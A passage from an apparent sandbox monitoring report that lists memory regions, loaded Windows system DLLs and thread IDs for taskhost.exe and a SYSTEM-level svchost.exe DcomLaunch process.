"c:\\windows\\system32\\ubpm.dll") Region: id = 1867 start_va = 0xba0000 end_va = 0xc1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 1868 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 1869 start_va = 0xb20000 end_va = 0xb9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 1870 start_va = 0xd50000 end_va = 0xdcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d50000" filename = "" Region: id = 1871 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 1872 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 1873 start_va = 0xdd0000 end_va = 0xf9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Region: id = 1874 start_va = 0x7feff0c0000 end_va = 0x7feff19afff monitored = 0 entry_point = 0x7feff0e0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1875 start_va = 0xf0000 end_va = 0xf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1876 start_va = 0xe40000 end_va = 0xebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e40000" filename = "" Region: id = 1877 start_va = 0xf20000 end_va = 0xf9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f20000" filename = "" Region: id = 1878 start_va = 0x1070000 end_va = 0x10effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001070000" filename = "" Region: id = 1879 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 1880 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 2076 start_va = 0x9d0000 end_va = 0xa4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 2077 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 3155 start_va = 0xfb0000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fb0000" filename = "" Region: id = 3156 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 3413 start_va = 0x410000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 3414 start_va = 0x7fefbb00000 end_va = 0x7fefbb10fff monitored = 0 entry_point = 0x7fefbb01070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 3415 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 3416 start_va = 0x7fefd880000 end_va = 0x7fefd8bcfff monitored = 0 entry_point = 0x7fefd8818f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 3481 start_va = 0x1150000 end_va = 0x11cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 3482 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 3516 start_va = 0xff3b0000 end_va = 0xff3c3fff monitored = 0 entry_point = 0xff3b2ce0 region_type = mapped_file name = "taskhost.exe" filename = "\\Windows\\System32\\taskhost.exe" (normalized: "c:\\windows\\system32\\taskhost.exe") Region: id = 3543 start_va = 0xc40000 end_va = 0xcbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c40000" filename = "" Region: id = 3544 start_va = 0x1210000 end_va = 0x128ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001210000" filename = "" Region: id = 3545 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 3546 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 3565 start_va = 0x12d0000 end_va = 0x134ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012d0000" filename = "" Region: id = 3566 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 4189 start_va = 0x1350000 end_va = 0x144ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001350000" filename = "" Region: id = 4435 start_va = 0x7feff880000 end_va = 0x7feff8ccfff monitored = 0 entry_point = 0x7feff881070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4436 start_va = 0x7feff870000 end_va = 0x7feff877fff monitored = 0 entry_point = 0x7feff871504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4437 start_va = 0x1450000 end_va = 0x171efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4438 start_va = 0x7fefd150000 end_va = 0x7fefd1a4fff monitored = 0 entry_point = 0x7fefd151054 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 4439 start_va = 0x7fefcb50000 end_va = 0x7fefcb56fff monitored = 0 entry_point = 0x7fefcb514b0 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 4440 start_va = 0x7fefd140000 end_va = 0x7fefd146fff monitored = 0 entry_point = 0x7fefd14142c region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 4441 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 4442 start_va = 0xf0000 end_va = 0xf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 4443 start_va = 0xf0000 end_va = 0xf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 4444 start_va = 0x100000 end_va = 0x100fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 4445 start_va = 0x110000 end_va = 0x110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 4446 start_va = 0x120000 end_va = 0x120fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 4447 start_va = 0x130000 end_va = 0x130fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 4448 start_va = 0x140000 end_va = 0x140fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 4449 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 4450 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 4451 start_va = 0x3f0000 end_va = 0x3f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 4452 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4453 start_va = 0x880000 end_va = 0x880fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 4454 start_va = 0x890000 end_va = 0x890fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 4455 start_va = 0x8a0000 end_va = 0x8a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 4456 start_va = 0x8b0000 end_va = 0x8b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 4457 start_va = 0x8c0000 end_va = 0x8c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 4458 start_va = 0x950000 end_va = 0x950fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 4459 start_va = 0x960000 end_va = 0x960fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000960000" filename = "" Region: id = 4460 start_va = 0x970000 end_va = 0x970fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 4461 start_va = 0x9c0000 end_va = 0x9c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009c0000" filename = "" Region: id = 4462 start_va = 0xad0000 end_va = 0xad0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 4463 start_va = 0xae0000 end_va = 0xae0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ae0000" filename = "" Region: id = 4464 start_va = 0xaf0000 end_va = 0xaf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 4465 start_va = 0xb00000 end_va = 0xb00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b00000" filename = "" Region: id = 4466 start_va = 0xb10000 end_va = 0xb10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b10000" filename = "" Region: id = 4467 start_va = 0xc20000 end_va = 0xc20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 4468 start_va = 0xc30000 end_va = 0xc30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c30000" filename = "" Region: id = 4469 start_va = 0xcc0000 end_va = 0xcc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 4470 start_va = 0xcd0000 end_va = 0xcd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 4471 start_va = 0xce0000 end_va = 0xce0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 4472 start_va = 0xcf0000 end_va = 0xcf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 4473 start_va = 0xd00000 end_va = 0xd00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 4474 start_va = 0xd10000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d10000" filename = "" Region: id = 4475 start_va = 0xd20000 end_va = 0xd20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d20000" filename = "" Region: id = 4476 start_va = 0xd30000 end_va = 0xd30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d30000" filename = "" Region: id = 4477 start_va = 0xd40000 end_va = 0xd40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d40000" filename = "" Region: id = 4478 start_va = 0x1720000 end_va = 0x181ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001720000" filename = "" Region: id = 4479 start_va = 0x1820000 end_va = 0x1a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001820000" filename = "" Region: id = 4525 start_va = 0xff3b0000 end_va = 0xff3c3fff monitored = 0 entry_point = 0xff3b2ce0 region_type = mapped_file name = "taskhost.exe" filename = "\\Windows\\System32\\taskhost.exe" (normalized: "c:\\windows\\system32\\taskhost.exe") Thread: id = 255 os_tid = 0x1c4 Thread: id = 257 os_tid = 0x20c Thread: id = 258 os_tid = 0x210 Thread: id = 259 os_tid = 0x214 Thread: id = 260 os_tid = 0x218 Thread: id = 261 os_tid = 0x21c Thread: id = 262 os_tid = 0x224 Thread: id = 263 os_tid = 0x228 Thread: id = 276 os_tid = 0x260 Thread: id = 358 os_tid = 0x104 Thread: id = 370 os_tid = 0x200 Thread: id = 401 os_tid = 0x440 Thread: id = 407 os_tid = 0x45c Thread: id = 408 os_tid = 0x460 Thread: id = 409 os_tid = 0x464 Process: id = "8" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x28f4f000" os_pid = "0x22c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x1c0" cmd_line = "C:\\Windows\\system32\\svchost.exe -k DcomLaunch" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\DcomLaunch" [0xa], "NT SERVICE\\PlugPlay" [0xe], "NT SERVICE\\Power" [0xa], "NT AUTHORITY\\Logon Session 00000000:00007bec" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1973 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1974 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1975 start_va = 0x210000 end_va = 0x28ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1976 start_va = 0x77970000 end_va = 0x77b18fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1977 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1978 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1979 start_va = 0xffce0000 end_va = 0xffceafff monitored = 0 entry_point = 0xffce246c region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1980 start_va = 0x7feffc90000 end_va = 0x7feffc90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1981 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1982 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 1983 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 1991 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1992 start_va = 0x80000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 1993 start_va = 0x77750000 end_va = 0x7786efff monitored = 0 entry_point = 0x77765340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1994 start_va = 0x7fefd9d0000 end_va = 0x7fefda3bfff monitored = 0 entry_point = 0x7fefd9d2780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1995 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1996 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1997 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1998 start_va = 0x180000 end_va = 0x1e6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1999 start_va = 0x7feff500000 end_va = 0x7feff59efff monitored = 0 entry_point = 0x7feff5025a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2000 start_va = 0x7feff7f0000 end_va = 0x7feff80efff monitored = 0 entry_point = 0x7feff7f60e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2001 start_va = 0x7feff6c0000 end_va = 0x7feff7ecfff monitored = 0 entry_point = 0x7feff70ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2002 start_va = 0x290000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 2003 start_va = 0x360000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 2004 start_va = 0x490000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 2005 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 2006 start_va = 0x540000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2007 start_va = 0x5f0000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 2008 start_va = 0x670000 end_va = 0x93efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2009 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 2010 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 2011 start_va = 0x7fefccd0000 end_va = 0x7fefcd36fff monitored = 0 entry_point = 0x7fefccdd320 region_type = mapped_file name = "umpnpmgr.dll" filename = "\\Windows\\System32\\umpnpmgr.dll" (normalized: "c:\\windows\\system32\\umpnpmgr.dll") Region: id = 2012 start_va = 0x7fefccb0000 end_va = 0x7fefcccefff monitored = 0 entry_point = 0x7fefccb5c68 region_type = mapped_file name = "spinf.dll" filename = "\\Windows\\System32\\SPInf.dll" (normalized: "c:\\windows\\system32\\spinf.dll") Region: id = 2013 start_va = 0x77870000 end_va = 0x77969fff monitored = 0 entry_point = 0x7788a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2014 start_va = 0x7feff010000 end_va = 0x7feff076fff monitored = 0 entry_point = 0x7feff01b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2015 start_va = 0x7feff080000 end_va = 0x7feff08dfff monitored = 0 entry_point = 0x7feff081080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2016 start_va = 0x7fefdc90000 end_va = 0x7fefdd58fff monitored = 0 entry_point = 0x7fefdd0a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2017 start_va = 0x7fefcc90000 end_va = 0x7fefcca1fff monitored = 0 entry_point = 0x7fefcc91060 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 2018 start_va = 0x50000 end_va = 0x78fff monitored = 0 entry_point = 0x51010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2019 start_va = 0x940000 end_va = 0xac7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 2020 start_va = 0x50000 end_va = 0x78fff monitored = 0 entry_point = 0x51010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2021 start_va = 0x7feff090000 end_va = 0x7feff0bdfff monitored = 0 entry_point = 0x7feff091010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2022 start_va = 0x7feff950000 end_va = 0x7feffa58fff monitored = 0 entry_point = 0x7feff951064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2023 start_va = 0x290000 end_va = 0x34ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 2024 start_va = 0x350000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 2025 start_va = 0xad0000 end_va = 0xc50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ad0000" filename = "" Region: id = 2026 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 2027 start_va = 0x50000 end_va = 0x50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2028 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2029 start_va = 0xc60000 end_va = 0xdfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c60000" filename = "" Region: id = 2030 start_va = 0x7fefd860000 end_va = 0x7fefd873fff monitored = 0 entry_point = 0x7fefd8610e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2031 start_va = 0xe40000 end_va = 0xebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e40000" filename = "" Region: id = 2032 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 2033 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 2034 start_va = 0x7fefcc70000 end_va = 0x7fefcc8dfff monitored = 0 entry_point = 0x7fefcc713b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2035 start_va = 0x7fefd8c0000 end_va = 0x7fefd8cefff monitored = 0 entry_point = 0x7fefd8c19b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2036 start_va = 0x7fefcc50000 end_va = 0x7fefcc6afff monitored = 0 entry_point = 0x7fefcc52068 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 2037 start_va = 0xc60000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c60000" filename = "" Region: id = 2038 start_va = 0xdf0000 end_va = 0xdfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 2039 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 2040 start_va = 0xd40000 end_va = 0xdbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d40000" filename = "" Region: id = 2041 start_va = 0xf80000 end_va = 0xffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f80000" filename = "" Region: id = 2042 start_va = 0x7fefd7b0000 end_va = 0x7fefd7befff monitored = 0 entry_point = 0x7fefd7b1010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2043 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 2044 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 2045 start_va = 0x1000000 end_va = 0x10fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 2046 start_va = 0xf00000 end_va = 0xf7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 2047 start_va = 0x7fefcc20000 end_va = 0x7fefcc4bfff monitored = 0 entry_point = 0x7fefcc21860 region_type = mapped_file name = "umpo.dll" filename = "\\Windows\\System32\\umpo.dll" (normalized: "c:\\windows\\system32\\umpo.dll") Region: id = 2048 start_va = 0x7fefd880000 end_va = 0x7fefd8bcfff monitored = 0 entry_point = 0x7fefd8818f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2049 start_va = 0x7fefdd60000 end_va = 0x7fefdf36fff monitored = 0 entry_point = 0x7fefdd61010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 2050 start_va = 0x7fefda40000 end_va = 0x7fefda75fff monitored = 0 entry_point = 0x7fefda41474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2051 start_va = 0x7feff0c0000 end_va = 0x7feff19afff monitored = 0 entry_point = 0x7feff0e0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2052 start_va = 0x7feff1a0000 end_va = 0x7feff276fff monitored = 0 entry_point = 0x7feff1a3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2053 start_va = 0x7fefe070000 end_va = 0x7fefe272fff monitored = 0 entry_point = 0x7fefe093330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2054 start_va = 0x7fefd970000 end_va = 0x7fefd989fff monitored = 0 entry_point = 0x7fefd971558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2055 start_va = 0x7fefcc10000 end_va = 0x7fefcc1cfff monitored = 0 entry_point = 0x7fefcc11348 region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 2056 start_va = 0x70000 end_va = 0x7cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 2057 start_va = 0x1100000 end_va = 0x124ffff monitored = 1 